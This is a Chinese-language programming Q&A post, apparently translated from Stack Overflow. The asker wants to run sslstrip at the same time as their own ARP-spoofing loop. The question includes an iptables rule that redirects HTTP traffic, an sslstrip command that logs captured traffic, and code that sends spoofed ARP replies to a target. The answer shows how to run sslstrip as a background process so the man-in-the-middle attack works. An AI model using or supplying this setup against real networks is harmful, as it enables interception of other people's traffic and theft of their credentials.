我已编写了一个执行arpspoofing的程序,现在我想在发送arp重放时调用sslstrip。
我不确定这对于线程或者如何更好地工作,我只是想知道什么是最简单的解决方案。
这是我尝试过的,不能发送arp重放(陷入sslstrip过程):
os.system("iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000")
os.system("sslstrip -l 1000 -w cap.txt")
while True:
try:
time.sleep(2)
print 'Injecting Arp Replay to '+target+' telling '+host+' is at '+mac
s.send(packet)
except KeyboardInterrupt:
print "bye"
os.system("iptables -t nat -D PREROUTING 1 ")
sys.exit(1)
有谁知道如何以简单的方式解决它?
答案 0 :(得分:1)
您可以使用subprocess module代替os.system
您可以打开sslstrip作为后台任务,并在脚本结束时终止它:
import subprocess
sslstrip = subprocess.Popen(["sslstrip", "-l", "1000", "-w", "cap.txt"], stdout=subprocess.PIPE)
# Run your script
# ...
# At the end terminate the process (in your KeyboardInterrput)
sslstrip.terminate()